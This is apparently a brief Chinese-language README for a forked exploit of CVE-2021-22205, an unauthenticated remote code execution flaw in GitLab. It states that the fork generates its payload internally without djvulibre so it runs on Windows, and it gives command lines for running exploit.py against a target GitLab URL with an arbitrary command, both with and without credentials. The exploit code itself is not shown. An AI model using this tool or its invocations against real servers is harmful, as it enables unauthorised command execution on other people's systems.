基于 mr-r3bot/Gitlab-CVE-2021-22205 的Fork
CVE-2021-22205: Gitlab 未授权远程代码执行漏洞 EXP
移除了对djvumake & djvulibre的依赖,直接内部生成payload,可在win平台执行。
# 需要授权
python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <command>
# 未授权
python3 exploit.py -t <gitlab_url> -c <command>